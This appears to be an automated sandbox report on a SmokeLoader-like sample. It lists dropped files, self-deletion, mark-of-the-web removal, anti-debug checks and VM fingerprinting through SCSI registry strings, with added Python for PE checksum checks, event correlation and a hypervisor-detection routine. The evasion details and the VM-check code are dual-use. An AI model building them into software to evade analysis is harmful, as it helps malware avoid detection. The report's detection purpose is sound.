00000006.00000002.2420171669.000001CD10FCA000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2417924534.000001CD0F7C4000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2420564826.000001CD113CE000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2418324178.000001CD0FBC4000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2417355522.000001CD0F1C1000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2419945194.000001CD10DC1000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2419145203.000001CD103C2000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2418675219.000001CD0FFC4000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 
00000006.00000002.2421629080.000001CD11DC1000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2421043779.000001CD117C0000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2418494622.000001CD0FDC8000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2419281806.000001CD105CB000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2419745402.000001CD10BC6000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2420797717.000001CD115CB000.00000004.00000020.00020000.00000000.sdmp, AA31.exe, 00000007.00000002.2493490885.00000253644CC000.00000004.00000020.00020000.00000000.sdmp, AA31.exe, 00000007.00000002.2492962721.00000253642C5000.00000004.00000020.00020000.00000000.sdmp, AA31.exe, 00000007.00000002.2492406389.0000025363ECF000.00000004.00000020.00020000.00000000.sdmp, AA31.exe, 00000007.00000002.2490286144.00000253638C6000.00000004.00000020.00020000.00000000.sdmp, AA31.exe, 00000007.00000002.2494767463.00000253650C3000.00000004.00000020.00020000.00000000.sdmp, AA31.exe, 00000007.00000002.2495732723.

      Data Obfuscation

Source: C:\Users\user\Desktop\n72I7qB2ss.exe | Unpacked PE file: 0.2.n72I7qB2ss.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\ashcvvs | Unpacked PE file: 5.2.ashcvvs.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\ashcvvs | Code function: 9_2_00407585 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer
Source: 70C1.exe.1.dr | Static PE information: real checksum: 0x1ffb2a should be: 0x203a91
Source: AA31.exe.1.dr | Static PE information: real checksum: 0x2008dc should be: 0x204843
Source: AA31.exe.1.dr | Static PE information: section name: .xdata
Source: 70C1.exe.1.dr | Static PE information: section name: .xdata
Source: C:\Users\user\Desktop\n72I7qB2ss.exe | Code function: 0_2_00403230 push eax; ret 0_2_00403302
Source: C:\Users\user\Desktop\n72I7qB2ss.exe | Code function: 0_2_004026FF push ecx; ret 0_2_0040270B
Source: C:\Users\user\Desktop\n72I7qB2ss.exe | Code function: 0_2_005D168F push esi; retf 0_2_005D16BC
Source: C:\Users\user\Desktop\n72I7qB2ss.exe | Code function: 0_2_005D2766 push ecx; ret 0_2_005D2772
Source: C:\Users\user\Desktop\n72I7qB2ss.exe | Code function: 0_2_0065FB65 push ss; retf 0_2_0065FB78
Source: C:\Users\user\Desktop\n72I7qB2ss.exe | Code function: 0_2_00660F2D pushad ; retf 0_2_00660FA6
Source: C:\Users\user\Desktop\n72I7qB2ss.exe | Code function: 0_2_00660F0E pushad ; retf 0_2_00660FA6
Source: C:\Users\user\Desktop\n72I7qB2ss.exe | Code function: 0_2_0065F7C1 push edi; retf 0_2_0065F7CC
Source: C:\Users\user\Desktop\n72I7qB2ss.exe | Code function: 0_2_0065FBA6 push ss; retf 0_2_0065FB78
Source: C:\Users\user\Desktop\n72I7qB2ss.exe | Code function: 0_2_0065F787 push edi; retf 0_2_0065F7CC
Source: C:\Users\user\AppData\Roaming\ashcvvs | Code function: 5_2_00403230 push eax; ret 5_2_00403302
Source: C:\Users\user\AppData\Roaming\ashcvvs | Code function: 5_2_004026FF push ecx; ret 5_2_0040270B
Source: C:\Users\user\AppData\Roaming\ashcvvs | Code function: 5_2_006D168F push esi; retf 5_2_006D16BC
Source: C:\Users\user\AppData\Roaming\ashcvvs | Code function: 5_2_006D2766 push ecx; ret 5_2_006D2772
Source: C:\Users\user\AppData\Roaming\ashcvvs | Code function: 5_2_006FE855 pushad ; retf 5_2_006FE8CE
Source: C:\Users\user\AppData\Roaming\ashcvvs | Code function: 5_2_006FE836 pushad ; retf 5_2_006FE8CE
Source: C:\Users\user\AppData\Roaming\ashcvvs | Code function: 5_2_006FD0E9 push edi; retf 5_2_006FD0F4
Source: C:\Users\user\AppData\Roaming\ashcvvs | Code function: 5_2_006FD4CE push ss; retf 5_2_006FD4A0
Source: C:\Users\user\AppData\Roaming\ashcvvs | Code function: 5_2_006FD0AF push edi; retf 5_2_006FD0F4
Source: C:\Users\user\AppData\Roaming\ashcvvs | Code function: 5_2_006FD48D push ss; retf 5_2_006FD4A0
Source: C:\Users\user\AppData\Roaming\ashcvvs | Code function: 9_2_00403399 push ecx; ret 9_2_004033AC
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\AA31.exe
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Roaming\ashcvvs
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Local\Temp\70C1.exe
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Roaming\ashcvvs
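The static findings in this section and in the "Static PE information" lines above (a stored checksum that does not match the computed one, more than ten sections, RELOCS_STRIPPED on the dropper, and an unpacked .text section that has become writable) can be reproduced offline from the file bytes alone. The following Python is an added example written for this page, not Joe Sandbox code: it implements the standard PE checksum algorithm (16-bit word sum with carry folding, the CheckSum field itself skipped, plus the file length), walks the section table, and reports the same classes of finding. The header-level writable+executable check is the static counterpart of the report's runtime ".text:ER vs .text:EW" observation. The minimal PE32 image it builds is constructed for the demonstration and is not one of the report's samples; function names are this example's own.

```python
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
IMAGE_FILE_RELOCS_STRIPPED = 0x0001
IMAGE_FILE_EXECUTABLE_IMAGE = 0x0002
IMAGE_FILE_32BIT_MACHINE = 0x0100


def pe_checksum(data, checksum_offset):
    """Standard PE checksum (the algorithm behind imagehlp's CheckSumMappedFile):
    sum all 16-bit words folding the carry back in, skip the 4-byte CheckSum
    field, then add the file length."""
    buf = data + b"\x00" * (len(data) % 2)        # pad an odd trailing byte
    total = 0
    for off in range(0, len(buf), 2):
        if checksum_offset <= off < checksum_offset + 4:
            continue
        total += struct.unpack_from("<H", buf, off)[0]
        total = (total & 0xFFFF) + (total >> 16)   # fold the carry
    total = (total & 0xFFFF) + (total >> 16)
    return total + len(data)


def parse_headers(data):
    """Return the header fields the checks below need (PE32 and PE32+)."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    _machine, nsect, _, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    checksum_off = opt + 64                  # CheckSum is at +64 in both PE32 and PE32+
    stored = struct.unpack_from("<I", data, checksum_off)[0]
    sections = []
    for i in range(nsect):
        base = opt + opt_size + i * 40       # IMAGE_SECTION_HEADER is 40 bytes
        name = data[base:base + 8].rstrip(b"\x00").decode("latin-1")
        flags = struct.unpack_from("<I", data, base + 36)[0]   # Characteristics
        sections.append((name, flags))
    return {"characteristics": chars, "checksum_offset": checksum_off,
            "stored_checksum": stored, "computed_checksum": pe_checksum(data, checksum_off),
            "sections": sections}


def set_checksum(data):
    """Return a copy with a correct CheckSum field (what the linker's /RELEASE does)."""
    h = parse_headers(data)
    out = bytearray(data)
    struct.pack_into("<I", out, h["checksum_offset"], h["computed_checksum"])
    return bytes(out)


def static_findings(data):
    """Findings phrased like the report's 'Static PE information' lines."""
    h = parse_headers(data)
    out = []
    if h["stored_checksum"] != h["computed_checksum"]:
        out.append("real checksum: 0x%x should be: 0x%x"
                   % (h["stored_checksum"], h["computed_checksum"]))
    if len(h["sections"]) > 10:
        out.append("Number of sections : %d > 10" % len(h["sections"]))
    for name, flags in h["sections"]:
        if flags & IMAGE_SCN_MEM_EXECUTE and flags & IMAGE_SCN_MEM_WRITE:
            out.append("section %s is writable and executable" % name)
    if h["characteristics"] & IMAGE_FILE_RELOCS_STRIPPED:
        out.append("RELOCS_STRIPPED: no relocations, image cannot be rebased (no ASLR)")
    return out


def build_sample_image(sections):
    """Constructed minimal PE32 image (headers only, not loadable) for the demo."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    opt_size = 224                            # size of a PE32 optional header
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size,
                       IMAGE_FILE_EXECUTABLE_IMAGE | IMAGE_FILE_32BIT_MACHINE
                       | IMAGE_FILE_RELOCS_STRIPPED)
    opt = struct.pack("<H", 0x10B) + b"\x00" * (opt_size - 2)   # CheckSum left at 0
    table = b"".join(name.encode().ljust(8, b"\x00") + b"\x00" * 28
                     + struct.pack("<I", flags) for name, flags in sections)
    return dos + b"PE\x00\x00" + coff + opt + table


if __name__ == "__main__":
    rwx = IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
    img = build_sample_image([(".text", rwx), (".rdata", IMAGE_SCN_MEM_READ)])
    for line in static_findings(img):
        print(line)
    print("after fixing the field:", static_findings(set_checksum(img)))
```

Two caveats when reading such findings: a stored checksum of 0 is common for user-mode binaries built without /RELEASE and means nothing on its own, whereas a wrong non-zero value (as on 70C1.exe and AA31.exe above) indicates the bytes were changed after linking, typically by a packer or a post-build patch; and Windows only enforces the checksum for drivers and a few system images, so a mismatch never stops the file from running.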

      Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\explorer.exe | File deleted: c:\users\user\desktop\n72i7qb2ss.exe
Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Roaming\ashcvvs:Zone.Identifier read attributes | delete
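Taken together, the behaviour lines in this report describe a chain that is characteristic of SmokeLoader once it has injected into the shell: explorer.exe writes ashcvvs, 70C1.exe and AA31.exe into the user profile, launches them, deletes the original sample from the Desktop, and opens ashcvvs:Zone.Identifier with delete access to strip the mark of the web. The following Python is an added example for this page, not Joe Sandbox output: it runs a small correlation over process, file and stream events in a Sysmon-like shape and raises the same four findings. The event records are constructed from the paths shown in this report, the drop-directory list and severities are this example's assumptions, and a few ordinary shell events are included to show the rules stay quiet on normal activity.

```python
import ntpath

# Assumed: directories a shell process has no business writing executables into.
USER_DROP_DIRS = ("\\appdata\\local\\temp\\", "\\appdata\\roaming\\")

# Constructed from the behaviour lines in this report (Sysmon-like shape).
SAMPLE_EVENTS = [
    {"type": "ProcessCreate", "image": r"C:\Users\user\Desktop\n72I7qB2ss.exe", "parent": None},
    {"type": "FileCreate", "image": r"C:\Windows\explorer.exe",
     "target": r"C:\Users\user\AppData\Roaming\ashcvvs"},
    {"type": "FileCreate", "image": r"C:\Windows\explorer.exe",
     "target": r"C:\Users\user\AppData\Local\Temp\70C1.exe"},
    {"type": "FileCreate", "image": r"C:\Windows\explorer.exe",
     "target": r"C:\Users\user\AppData\Local\Temp\AA31.exe"},
    {"type": "ProcessCreate", "image": r"C:\Users\user\AppData\Local\Temp\70C1.exe",
     "parent": r"C:\Windows\explorer.exe"},
    {"type": "ProcessCreate", "image": r"C:\Users\user\AppData\Roaming\ashcvvs", "parent": None},
    {"type": "FileDelete", "image": r"C:\Windows\explorer.exe",
     "target": r"c:\users\user\desktop\n72i7qb2ss.exe"},
    {"type": "FileOpen", "image": r"C:\Windows\explorer.exe",
     "target": r"C:\Users\user\AppData\Roaming\ashcvvs:Zone.Identifier",
     "access": "read attributes | delete"},
]

# Constructed ordinary shell activity that must not alert.
BENIGN_EVENTS = [
    {"type": "ProcessCreate", "image": r"C:\Windows\System32\notepad.exe",
     "parent": r"C:\Windows\explorer.exe"},
    {"type": "FileCreate", "image": r"C:\Windows\explorer.exe",
     "target": r"C:\Users\user\Documents\notes.txt"},
    {"type": "FileDelete", "image": r"C:\Windows\explorer.exe",
     "target": r"C:\Users\user\Documents\old.txt"},
]


def is_shell(image):
    return ntpath.basename(image or "").lower() == "explorer.exe"


def in_drop_dir(path):
    return any(d in path for d in USER_DROP_DIRS)


def triage(events):
    """Correlate one host's event stream; returns (severity, reason) tuples."""
    launched = set()        # lower-cased image paths seen in ProcessCreate
    alerts = []
    for ev in events:
        kind = ev["type"]
        if kind == "ProcessCreate":
            img = ev["image"].lower()
            launched.add(img)
            if in_drop_dir(img) and ntpath.splitext(img)[1] == "":
                alerts.append(("high", "extension-less binary executed from profile: " + ev["image"]))
            elif is_shell(ev.get("parent")) and in_drop_dir(img):
                alerts.append(("medium", "explorer.exe launched a binary from a drop dir: " + ev["image"]))
        elif kind == "FileCreate" and is_shell(ev["image"]):
            tgt = ev["target"].lower()
            if in_drop_dir(tgt) and ntpath.splitext(tgt)[1] in ("", ".exe", ".dll"):
                alerts.append(("medium", "shell process wrote an executable: " + ev["target"]))
        elif kind == "FileDelete" and is_shell(ev["image"]):
            if ev["target"].lower() in launched:
                alerts.append(("high", "self-deletion: explorer.exe removed an executed binary: " + ev["target"]))
        elif kind == "FileOpen" and is_shell(ev["image"]):
            tgt = ev["target"].lower()
            if tgt.endswith(":zone.identifier") and "delete" in ev.get("access", "").lower():
                alerts.append(("medium", "mark-of-the-web removed: " + ev["target"]))
    return alerts


if __name__ == "__main__":
    for severity, reason in triage(SAMPLE_EVENTS):
        print(severity.upper(), reason)
    print("benign stream:", triage(BENIGN_EVENTS))
```

explorer.exe is the parent of almost everything a user starts, so the rules deliberately key on the drop directories and on extension-less images rather than on the parent alone, and the self-deletion rule only fires for a file the same stream has already seen executed. In a production pipeline, key the `launched` set per host and expire it after a reasonable window, and treat the Zone.Identifier rule as supporting evidence, since the shell also touches that stream when a user clicks Unblock.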

      Malware Analysis System Evasion

      Source: C:\Users\user\Desktop\n72I7qB2ss.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\n72I7qB2ss.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\n72I7qB2ss.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\n72I7qB2ss.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\n72I7qB2ss.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\Desktop\n72I7qB2ss.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\ashcvvsKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\ashcvvsKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\ashcvvsKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\ashcvvsKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\ashcvvsKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
      Source: C:\Users\user\AppData\Roaming\ashcvvsKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
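Both the dropper and its persistence copy enumerate HKLM\SYSTEM\ControlSet001\Enum\SCSI six times each; this is the "virtual machine (disk enumeration)" check from the signature list, which looks at the vendor and product strings in the SCSI device instance names. The following Python is an added example for this page, not the sample's code and not Joe Sandbox code: it reproduces the check in a defensive form so an analyst can see whether a given analysis VM would be fingerprinted by it. The marker list and the sample key names are this example's assumptions (representative of the `Disk&Ven_...&Prod_...` instance-name format), and the registry read is guarded so the matching logic runs on any platform.

```python
import sys

# Assumed: vendor/product fragments that hypervisor-backed disks expose in their
# SCSI instance names. "virtual" also catches Hyper-V's Msft Virtual Disk.
HYPERVISOR_MARKERS = ("vmware", "vbox", "qemu", "virtio", "virtual", "xen")


def hypervisor_hits(scsi_keys):
    """scsi_keys: subkey names below HKLM\\SYSTEM\\ControlSet001\\Enum\\SCSI,
    e.g. 'Disk&Ven_VMware&Prod_Virtual_disk'. Returns (key, marker) pairs."""
    hits = []
    for key in scsi_keys:
        low = key.lower().replace("_", " ")
        for marker in HYPERVISOR_MARKERS:
            if marker in low:
                hits.append((key, marker))
                break
    return hits


def read_scsi_keys():
    """Enumerate the same key the sample enumerates; empty list off Windows."""
    if sys.platform != "win32":
        return []
    import winreg
    keys = []
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"SYSTEM\ControlSet001\Enum\SCSI") as h:
        i = 0
        while True:
            try:
                keys.append(winreg.EnumKey(h, i))
            except OSError:          # no more subkeys
                break
            i += 1
    return keys


# Constructed instance names in the format Windows uses under Enum\SCSI.
SAMPLE_KEYS = [
    "Disk&Ven_VMware&Prod_Virtual_disk",
    "Disk&Ven_VBOX&Prod_HARDDISK",
    "CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00",
    "Disk&Ven_Samsung&Prod_SSD_870_EVO",
]

if __name__ == "__main__":
    keys = read_scsi_keys() or SAMPLE_KEYS
    for key, marker in hypervisor_hits(keys):
        print("%r would be flagged (matched %r)" % (key, marker))
```

Run on the analysis VM itself, a non-empty result means this check will trip unless the disk's vendor and product strings are changed at the hypervisor level (the registry names are derived from the device's inquiry data, so editing the key alone is not enough). The same fragment matching is what makes the malware side of this check error-prone: Storage Spaces volumes on physical hardware also carry a "Virtual Disk" product string.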
      Source: C:\Users\user\Desktop\n72I7qB2ss.exeAPI/Special instruction interceptor: Address: 7FFE2220E814
      Source: C:\Users\user\Desktop\n72I7qB2ss.exeAPI/Special instruction interceptor: Address: 7FFE2220D584
      Source: C:\Users\user\AppData\Roaming\ashcvvsAPI/Special instruction interceptor: Address: 7FFE2220E814
      Source: C:\Users\user\AppData\Roaming\ashcvvsAPI/Special instruction interceptor: Address: 7FFE2220D584
      Source: ashcvvs, 00000005.00000002.2060813852.00000000006EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOKN
      Source: n72I7qB2ss.exe, 00000000.00000002.1769033987.000000000064E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK
      Source: C:\Windows\explorer.exe  Window / User API: threadDelayed 449
      Source: C:\Windows\explorer.exe  Window / User API: threadDelayed 2747
      Source: C:\Windows\explorer.exe  Window / User API: threadDelayed 987
      Source: C:\Windows\explorer.exe  Window / User API: threadDelayed 2077
      Source: C:\Windows\explorer.exe  Window / User API: foregroundWindowGot 879
      Source: C:\Windows\explorer.exe  Window / User API: foregroundWindowGot 877
      Source: C:\Users\user\AppData\Roaming\ashcvvs  API coverage: 5.3 %
      Source: C:\Windows\explorer.exe TID: 7164  Thread sleep count: 449 > 30
      Source: C:\Windows\explorer.exe TID: 5104  Thread sleep count: 2747 > 30
      Source: C:\Windows\explorer.exe TID: 5104  Thread sleep time: -274700s >= -30000s
      Source: C:\Windows\explorer.exe TID: 6148  Thread sleep count: 987 > 30
      Source: C:\Windows\explorer.exe TID: 6148  Thread sleep time: -98700s >= -30000s
      Source: C:\Windows\explorer.exe TID: 2692  Thread sleep count: 275 > 30
      Source: C:\Windows\explorer.exe TID: 2416  Thread sleep count: 270 > 30
      Source: C:\Windows\explorer.exe TID: 6104  Thread sleep count: 277 > 30
      Source: C:\Windows\explorer.exe TID: 5104  Thread sleep count: 2077 > 30
      Source: C:\Windows\explorer.exe TID: 5104  Thread sleep time: -207700s >= -30000s
      Source: C:\Users\user\AppData\Local\Temp\70C1.exe TID: 4632  Thread sleep time: -50840s >= -30000s
      Source: C:\Users\user\AppData\Local\Temp\70C1.exe TID: 6656  Thread sleep time: -30000s >= -30000s
      Source: C:\Users\user\AppData\Local\Temp\AA31.exe TID: 2336  Thread sleep time: -76296s >= -30000s
      Source: C:\Users\user\AppData\Local\Temp\AA31.exe TID: 6840  Thread sleep time: -30000s >= -30000s
      Source: C:\Users\user\Desktop\n72I7qB2ss.exe  Code function: 0_2_0042379F GetSystemTimes followed by cmp: cmp dword ptr [0043a3ach], 0ah and CTI: jne 00423993h
      Source: C:\Users\user\AppData\Roaming\ashcvvs  Code function: 5_2_0042379F GetSystemTimes followed by cmp: cmp dword ptr [0043a3ach], 0ah and CTI: jne 00423993h
      Source: C:\Users\user\AppData\Roaming\ashcvvs  Code function: 9_2_0042379F GetSystemTimes followed by cmp: cmp dword ptr [0043a3ach], 0ah and CTI: jne 00423993h
      Source: C:\Users\user\Desktop\n72I7qB2ss.exe  Code function: 0_2_0042379F GetLogicalDriveStringsW,DeleteVolumeMountPointW,GetCommandLineA,lstrcatW,InterlockedExchange,GetActiveWindow,GetSystemWindowsDirectoryW,WriteConsoleW,IntersectRect,FlushInstructionCache,GetAtomNameA,GlobalDeleteAtom,GetCurrentConsoleFont,SearchPathA,GetDefaultCommConfigA,DebugBreak,EnumDateFormatsW,SetCommMask,GetTickCount,GetSystemTimes,FoldStringW,OpenWaitableTimerA,HeapLock,FormatMessageW,GlobalAlloc,LoadLibraryA
      Source: C:\Users\user\AppData\Local\Temp\AA31.exe  Code function: 7_2_00007FF65B154F94 GetSystemInfo
      Source: explorer.exe, 00000001.00000000.1751055760.00000000098A8000.00000004.00000001.00020000.00000000.sdmp  Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
      Source: explorer.exe, 00000001.00000000.1750648090.0000000009815000.00000004.00000001.00020000.00000000.sdmp  Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
      Source: explorer.exe, 00000001.00000000.1750648090.0000000009815000.00000004.00000001.00020000.00000000.sdmp  Binary or memory string: NECVMWar VMware SATA CD00\w
      Source: explorer.exe, 00000001.00000000.1749370203.00000000079FB000.00000004.00000001.00020000.00000000.sdmp  Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}'
      Source: explorer.exe, 00000001.00000000.1751055760.00000000098A8000.00000004.00000001.00020000.00000000.sdmp  Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
      Source: explorer.exe, 00000001.00000000.1748144238.0000000001240000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
      Source: explorer.exe, 00000001.00000000.1749370203.00000000079FB000.00000004.00000001.00020000.00000000.sdmp  Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000001.00000000.1751055760.0000000009977000.00000004.00000001.00020000.00000000.sdmp  Binary or memory string: VMware SATA CD00
      Source: AA31.exe, 00000007.00000002.2487058205.00000253616F3000.00000004.00000020.00020000.00000000.sdmp, AA31.exe, 00000007.00000003.2475479688.00000253616F3000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: Hyper-V RAWm
      Source: explorer.exe, 00000001.00000000.1749370203.00000000078AD000.00000004.00000001.00020000.00000000.sdmp  Binary or memory string: NXTTAVMWare
      Source: AA31.exe, 00000007.00000002.2486672501.000002536167C000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: Hyper-V RAW0
      Source: explorer.exe, 00000001.00000000.1750648090.0000000009815000.00000004.00000001.00020000.00000000.sdmp  Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
      Source: explorer.exe, 00000001.00000000.1750648090.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1750648090.000000000982D000.00000004.00000001.00020000.00000000.sdmp, 70C1.exe, 00000006.00000003.2401956782.000001CD0D2A5000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2415753846.000001CD0D22C000.00000004.00000020.00020000.00000000.sdmp, 70C1.exe, 00000006.00000002.2416056931.000001CD0D2A5000.00000004.00000020.00020000.00000000.sdmp, AA31.exe, 00000007.00000002.2487058205.00000253616F3000.00000004.00000020.00020000.00000000.sdmp, AA31.exe, 00000007.00000003.2475479688.00000253616F3000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: Hyper-V RAW
      Source: explorer.exe, 00000001.00000000.1751055760.0000000009977000.00000004.00000001.00020000.00000000.sdmp  Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
      Source: explorer.exe, 00000001.00000000.1749370203.0000000007A34000.00000004.00000001.00020000.00000000.sdmp  Binary or memory string: Hyper-V RAWen-GBnx
      Source: explorer.exe, 00000001.00000000.1750648090.0000000009660000.00000004.00000001.00020000.00000000.sdmp  Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
      Source: explorer.exe, 00000001.00000000.1748144238.0000000001240000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
      Source: explorer.exe, 00000001.00000000.1748144238.0000000001240000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: C:\Users\user\AppData\Local\Temp\70C1.exe  API call chain: ExitProcess graph end node (graph_6-1338, graph_6-1262)
      Source: C:\Users\user\AppData\Local\Temp\AA31.exe  API call chain: ExitProcess graph end node (graph_7-4368, graph_7-4318, graph_7-4155, graph_7-4258, graph_7-4366, graph_7-4192, graph_7-4667, graph_7-4315, graph_7-4447, graph_7-4452, graph_7-4901, graph_7-4064, graph_7-4302, graph_7-4555, graph_7-4161, graph_7-4331, graph_7-4359, graph_7-4340, graph_7-4550, graph_7-4477)
      Source: C:\Windows\explorer.exe  Process information queried: ProcessInformation
      Source: C:\Users\user\Desktop\n72I7qB2ss.exe  Process queried: DebugPort
      Source: C:\Users\user\AppData\Roaming\ashcvvs  Process queried: DebugPort
      Source: C:\Users\user\AppData\Roaming\ashcvvs  Code function: 9_2_00401006 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
